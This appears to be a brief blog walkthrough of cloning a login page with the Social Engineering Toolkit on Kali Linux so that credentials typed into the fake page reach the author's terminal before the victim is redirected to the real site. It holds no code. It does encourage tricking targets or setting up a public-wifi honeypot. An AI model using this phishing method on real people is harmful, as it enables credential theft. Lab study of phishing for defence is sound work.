← Back Published on

Credential Harvesting

This is a very simple yet effective tool using a pre-installed tool on Kali Linux called the social engineering toolkit!

I simply spun up my attacking machine and opened the Social Engineering Toolkit to configure my attack

And obtained a specific target that I'm going to replicate

I then opened the social engineering attacks options and selected to run a website attack vector

The goal here is to CLONE the website!

I set my Kali Linux machine's IP to be the listening harvester. All information will be displayed to my terminal! 


Now, I copied the entire page displaying the Login request by simply inserting the address of my target page

The Cloned website's IP displays as My KALI VM’s IP now! When would this be useful? If we trick the target into clicking this link instead of the original! Or if we are using this as a honey pot on public wifi possibly! The uses for this are vast!

When a user is attempting to log in, they insert the regular username and password he or she uses and this gets directly sent to my terminal

They will get a display of a failed login attempt for the user and be immediately redirected to the original login page that I personally copied!

From here, they can successfully log in as they are no longer on my fake login prompt page.

And the credentials are been successfully harvested and displayed in my terminal as you can see! :)